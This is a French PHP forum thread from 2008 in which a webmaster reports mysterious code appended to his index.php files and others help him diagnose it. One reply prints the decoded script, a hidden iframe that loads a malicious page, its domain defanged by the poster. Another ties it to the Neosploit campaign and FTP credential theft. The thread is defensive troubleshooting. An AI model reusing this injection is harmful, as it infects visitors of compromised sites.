PHPFrance

de **nemrod** le 17 Nov 2008, 06:15

Salitation,

Ca fait un bon moment, j'ai remarqué un code qui s'ajoute a tout mes fichiers index.php. Je ne connais ni l'origine ni la raison.

J'ai aussi remarqué que ce code vient juste après la balise <body> ou juste avant la balise </body>

Tout sélectionner

Comment s'en debarasser et est-ce-que vous avez une idée sur la faille sécuritaire que ce code utilise.

Merci pour votre aide.

Salut ,

Je pense à plusieurs possibilités pour ces ajout de code :

1: ton code contient une faille qui permet à un pirate de lancer du code qu'il a injecté sur ton serveur , genre faille au niveau d'un upload de fichiers.

2: ton serveur a été piraté , et un genre de "rootkit" tourne dessus , car pour modifier le contenu de fichiers sur un serveur , il te faut la main ( d'une certaine maniére dessus ).

3: Ton poste de développement et aussi peut être vérolé .. et tu uploads tes fichiers vérolés à ton insu sur ton serveur ...

Essaye de voir les dernières modifications de tes fichiers , épluches les log , regardes les process qui tournent sur ton serveur , fais des tests , en créant un nouveau fichier index et surveille le ...

Maintenant , je ne suis pas non plus un expert en sécurité , mais l'ajout de code dans mes fichiers sur mon serveur , m'inquiéterai énormément ...

bon courage ...
cdt,
Stopher.

http://www.lastfm.fr/user/Sekiltoyai · de **Sékiltoyai** le 17 Nov 2008, 09:56

Pour information, après décryptage, ce code exécute ceci :

Tout sélectionner

window.status='Done';document.write('')

Le cryptage est soit dit en passant particulièrement inutile dans la mesure où il est très simple quand on a la clé, l'algorithme et la chaine cryptée de trouver la chaine décryptée…

de **@rthur** le 17 Nov 2008, 09:56

Bonjour,

Voila ce que donne le code javascript que tu as posté une fois décodé:

Tout sélectionner

window.status='Done';
document.write('<iframe name=874e
src="http://7addition[ATTENTION_VIRUS].info/t/?'
+Math.round(Math.random()*46556)+'874e'+'" width=452 height=103 style="display:none"></iframe>')

Il renvoie effectivement vers une page qui contient un virus dans un fichier PDF, j'ai ajouté le tag "[ATTENTION_VIRUS]" pour éviter qu'un visiteur de PHPfrance copie-colle ce javascript et le teste sans prendre les précaution d'usage.

En clair c'est véritablement un code malfaisant par conséquent, suit les instructions données par stopher et commence par:
1) faire une sauvegarde de tes fichiers importants
2) installe un antivirus/firewall efficace

http://www.lastfm.fr/user/Sekiltoyai · de **Sékiltoyai** le 17 Nov 2008, 09:58

Merde le document.write m'a tué.

Edit : Après re-test on est d'accord @rthur

de **nemrod** le 18 Nov 2008, 05:31

Merci stopher, Sékiltoyai et @rthur pour vos reponses.

Pour mon code, Je ne sais pas si il contient une faille mais j'ai verifié sur d'autres sites que j'ai realisé (avec la meme methodologie) et aucun d'eux n'est infectés.

Pour le serveur, je suis avec avec un hebergeur globat.com, et d'apres eux, il n'y a ni spayware ni virus sur le serveur.

Pour mon poste de développement, je l'ai scanné 1000 fois avec McCafé, Kaspersky et l'Anti-Malware ... et rien n'a été trouvé.

Mais ce que j'ai constaté:
C'est un code qui vient apres suppression. Je le retrouve sur mes page 1 à 2 semaines après.
C'est un code qui ne touche que les pages INDEX.PHP.
Je ne pense pas que mes bases de données ont été touché.
Je suis sur que c'est un robot et non un pirate.
Je pense que c'est peut etre une faille dans mes include

Je vais suivre vos conseils, downlaoder tout le site (plus de 3000 pages), vider tout le site, nettoyer les pages une à une, scanner le ficher avec un anti-virus et ré-uploader tout.

j'ai perdu 75% de mes visiteurs...

de **mojorisin** le 18 Nov 2008, 08:26

Bonjour,
je pense que vous devriez modifier vos code d'accès FTP.
En fait ce type de chose ressemble à une attaque avec neosploit.

Plusieurs vagues d’attaques informatiques ont été lancées ces derniers jours à l’encontre de dizaines de milliers de sites Internet, dans le but de les compromettre discrètement et d’infecter ainsi, ensuite, les internautes les visitant. Elles utilisent un code malveillant dénommé "Neosploit".

Lorsqu’un internaute visite un site compromis par Neosploit, ce dernier adapte son attaque à la configuration de l’internaute : il teste ainsi l’ordinateur ciblé, détermine ses vulnérabilités et conduit ensuite l’attaque par le moyen le plus adapté.

En l’état de l’analyse réalisée par le Centre opérationnel de la sécurité des systèmes d’information (COSSI) de la Direction centrale de la sécurité des systèmes d’information (DCSSI), les vulnérabilités exploitées sont toutes connues (vulnérabilités du logiciel Adobe Acrobat, du lecteur QuickTime ainsi que de certains contrôles ActiveX d’Internet Explorer). Une machine mise à jour de ses correctifs de sécurité ne peut donc a priori pas être compromise.

Le COSSI dispose par ailleurs d’une liste de sites français potentiellement compromis. Il s’agit exclusivement de sites de transferts de fichiers (FTP) et non pas de sites Internet (HTTP) utilisés par les internautes pour naviguer. Cependant, dans certains cas, ces sites FTP sont utilisés pour administrer des sites HTTP.

Ces sites FTP sont principalement gérés par des particuliers ou des PME. Les différents opérateurs qui hébergent ces sites Internet potentiellement compromis ont été prévenus.

News tiré de http://www.securite-informatique.gouv.fr/gp_article652.html

Autre informations :
http://securite.reseaux-telecoms.net/actualites/lire-le-toolkit-neosploit-refait-surface-18867.html
http://www.itrnews.com/articles/82970/neosploit-3-1-retour.html

Et sinon google

PHPFrance

Recherche dynamique PHPfrance

Sécurite: Problème sur mes Index.php

Sécurite: Problème sur mes Index.php

Publicité

Qui est en ligne